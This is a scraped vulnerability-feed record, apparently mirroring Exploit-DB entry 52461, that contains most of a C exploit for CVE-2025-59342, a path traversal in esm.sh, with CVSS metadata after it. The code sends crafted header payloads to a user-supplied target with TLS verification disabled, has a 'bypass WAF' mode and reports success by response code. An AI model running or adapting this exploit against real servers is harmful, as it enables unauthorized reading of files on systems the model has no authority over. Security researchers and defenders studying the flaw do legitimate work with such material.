\\r\\n \\”X-Zone-Id: %s\\”, \\r\\n payloads[i]);\\r\\n\\r\\n h = curl_slist_append(h, hLine);\\r\\n h = curl_slist_append(h, \\r\\n \\”User-Agent: Den\/8.7.1\\”);\\r\\n h = curl_slist_append(h, \\r\\n \\”Content-Type: application\/json\\”);\\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_URL, \\r\\n fullURL);\\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_HTTPHEADER, \\r\\n h);\\r\\n if (cF)\\r\\n {\\r\\n\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEFILE,\\r\\n cookies);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEJAR,\\r\\n cookies);\\r\\n\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POSTFIELDS, \\r\\n postData);\\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_POSTFIELDSIZE, \\r\\n (long)strlen(postData));\\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_WRITEFUNCTION, \\r\\n write_cb);\\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_WRITEDATA, \\r\\n \\u0026responseBypass);\\r\\n struct timespec rqtp, rmtp;\\r\\n rqtp.tv_sec = 1;\\r\\n rqtp.tv_nsec = 500000000;\\r\\n register long r10R asm(\\”r10\\”);\\r\\n r10R = 0;\\r\\n printf(\\”\\\\e[0;33m[+] Sleep (%ld seconds) \\u0026\\u0026 (%ld nanoseconds)…\\\\e[0m\\\\n\\”,\\r\\n rqtp.tv_sec, rqtp.tv_nsec);\\r\\n int ret;\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”syscall\\”\\r\\n : \\”=a\\”(ret)\\r\\n : \\”a\\”(0xE6),\\r\\n \\”D\\”((long)0),\\r\\n \\”S\\”((long)0),\\r\\n \\”d\\”(\\u0026rqtp),\\r\\n \\”r\\”(r10R)\\r\\n : \\”rcx\\”,\\r\\n \\”r11\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_TIMEOUT,\\r\\n 10L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYPEER,\\r\\n 0L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYHOST,\\r\\n 0L);\\r\\n res1 = curl_easy_perform(curl);\\r\\n curl_slist_free_all(h); \\r\\n if (res1 == CURLE_OK)\\r\\n {\\r\\n long httpC;\\r\\n printf(\\”—————————————————————————————————\\\\n\\”);\\r\\n printf(\\”\\\\e[1;36m[+] Request sent successfully\\\\e[0m\\\\n\\”);\\r\\n printf(\\”[+] Payload Test : %s\\\\n\\”, payloads[i]);\\r\\n\\r\\n curl_easy_getinfo(curl, \\r\\n CURLINFO_RESPONSE_CODE,\\r\\n \\u0026httpC);\\r\\n printf(\\”[+] Http code : %ld\\\\n\\”, \\r\\n httpC);\\r\\n \\r\\n if (responseBypass.buffer != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;35m=============================================== [RESPONSE] ===============================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, responseBypass.buffer);\\r\\n printf(\\”\\\\e[0;35m==========================================================================================================\\\\e[0m\\\\n\\”);\\r\\n if (httpC == 501 || strstr(responseBypass.buffer, \\r\\n \\”Unsupported method\\”) != NULL)\\r\\n {\\r\\n printf(\\”[-] Please check target URL, The server does not support the POST request.\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n __asm__ volatile(\\”nop\\”);\\r\\n }\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Response NULL !\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n if (httpC \\u003e= 200 \\u0026\\u0026 httpC \\u003c 300)\\r\\n {\\r\\n if (code == 0)\\r\\n {\\r\\n printf(\\”[+] Bypass Waf Success.\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] The server’s response is still negative !\\\\n\\”);\\r\\n }\\r\\n if (responseBypass.buffer != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;35m=============================================== [RESPONSE] ===============================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, responseBypass.buffer);\\r\\n printf(\\”%zu\\\\n\\”, responseBypass.len);\\r\\n printf(\\”\\\\e[0;35m==========================================================================================================\\\\e[0m\\\\n\\”);\\r\\n free(responseBypass.buffer);\\r\\n responseBypass.buffer = NULL;\\r\\n responseBypass.len = 0;\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Response NULL (Bypass WAF) !\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n \\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Http code Not 200-300 !\\\\n\\”);\\r\\n printf(\\”[+] Waf detect OR check input base url \/ port.\\\\n\\”);\\r\\n }\\r\\n }\\r\\n \\r\\n }\\r\\n\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Error Send Request !\\\\n\\”);\\r\\n }\\r\\n curl_easy_cleanup(curl); \\r\\n}\\r\\nint main(int argc,\\r\\n const char** argv)\\r\\n{\\r\\n printf(\\”\\\\e[1;37m+———————–+\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;37m| Author : Byte Reaper |\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;37m| CVE : CVE-2025-59342 |\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;37m| Vuln : Path Traversal |\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;37m+———————–+\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;30m————————————————————————\\\\e[0m\\\\n\\”);\\r\\n printf(\\”[+] Check Your os…\\\\n\\”);\\r\\n struct utsname os;\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov %0, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3F, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n : \\”r\\”(\\u0026os)\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”\\r\\n );\\r\\n printf(\\”\\\\e[0;36m[+] System Name: %s\\\\e[0m\\\\n\\”, os.sysname);\\r\\n printf(\\”\\\\e[0;36m[+] Machine : %s\\\\e[0m\\\\n\\”, os.machine);\\r\\n if (strstr(os.sysname, \\”Linux\\”) != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Linux OS, Check Machine architecture…\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] OS Not Linux 64 bit (%s),Exit…\\\\e[0m\\\\n\\”, os.sysname);\\r\\n printf(\\”[+] Please RUN exploit in linux.\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n if (strstr(os.machine, \\”x86_64\\”) != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Machine architecture is 64 bit, run exploit…\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] OS Not architecture 64 bit (%s), Exit…\\\\e[0m\\\\n\\”, os.machine);\\r\\n exit64bit();\\r\\n }\\r\\n const char* url = NULL;\\r\\n struct argparse_option options[] =\\r\\n {\\r\\n OPT_HELP(),\\r\\n OPT_STRING(‘u’,\\r\\n \\”url\\”,\\r\\n \\u0026url,\\r\\n \\”Enter Target URL.\\”),\\r\\n OPT_INTEGER(‘p’,\\r\\n \\”port\\”,\\r\\n \\u0026selectPort,\\r\\n \\”Enter Target PORT.\\”),\\r\\n OPT_BOOLEAN(‘v’,\\r\\n \\”verbose\\”,\\r\\n \\u0026verbose,\\r\\n \\”Verbose Mode.\\”),\\r\\n OPT_STRING(‘c’,\\r\\n \\”cookies\\”,\\r\\n \\u0026cookies,\\r\\n \\”Enter File cookies.\\”),\\r\\n OPT_STRING(‘k’,\\r\\n \\”payload\\”,\\r\\n \\u0026payload,\\r\\n \\”Enter Payload.\\”),\\r\\n OPT_BOOLEAN(‘b’,\\r\\n \\”bypass\\”,\\r\\n \\u0026sP,\\r\\n \\”Arg Bypass WAF.\\”),\\r\\n OPT_END()\\r\\n };\\r\\n struct argparse argparse;\\r\\n argparse_init(\\u0026argparse,\\r\\n options,\\r\\n NULL,\\r\\n 0);\\r\\n argparse_parse(\\u0026argparse,\\r\\n argc,\\r\\n argv);\\r\\n\\r\\n if (!url)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Please Enter Target IP OR URl !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[!] Exemple : .\/CVE-2025-59342 -u http:\/\/TARGET\\\\e[0m\\\\n\\”);\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”xor %%rdi, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”1:\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n : \\”rax\\”, \\r\\n \\”rdi\\”, \\r\\n \\”rsi\\”\\r\\n );\\r\\n }\\r\\n if (verbose)\\r\\n {\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”add $0x1, %[var6]\\\\n\\\\t\\”\\r\\n : [var6] \\”+r\\” (verbose)\\r\\n :\\r\\n :\\r\\n );\\r\\n }\\r\\n else\\r\\n {\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x0, %[var7]\\\\n\\\\t\\”\\r\\n : [var7] \\”=r\\” (verbose)\\r\\n :\\r\\n :\\r\\n );\\r\\n }\\r\\n flagPort = (selectPort != -1);\\r\\n \\r\\n if (payload != NULL)\\r\\n {\\r\\n s = 1;\\r\\n }\\r\\n else\\r\\n {\\r\\n s = 0;\\r\\n }\\r\\n if (sP) \\r\\n {\\r\\n bypass(url);\\r\\n }\\r\\n else\\r\\n {\\r\\n request(url); \\r\\n }\\r\\n printf(\\”\\\\e[0;36m[+] Finish Script.\\\\n\\”);\\r\\n __asm__ volatile\\r\\n (\\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x0, %%rdi\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n :\\”rax\\”, \\”rdi\\”\\r\\n );\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52461″,”cvss”:{“score”:6.9,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/SC:N\/VI:L\/SI:N\/VA:N\/SA:N\/E:P”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52461″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-16T08:46:49″,”description”:”Exploit Title: esm-dev 136 – Path Traversal Date: 2025-07-11 Exploit Author: Byte Reaper Vendor Homepage: https:\/\/github.com\/esm-dev\/esm.sh Software Link: https:\/\/github.com\/esm-dev\/esm.sh CVE-2025-59342 – File : exploit.c –…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,48,12,40,21,13,7,11,5],"class_list":["post-31285","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-69","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n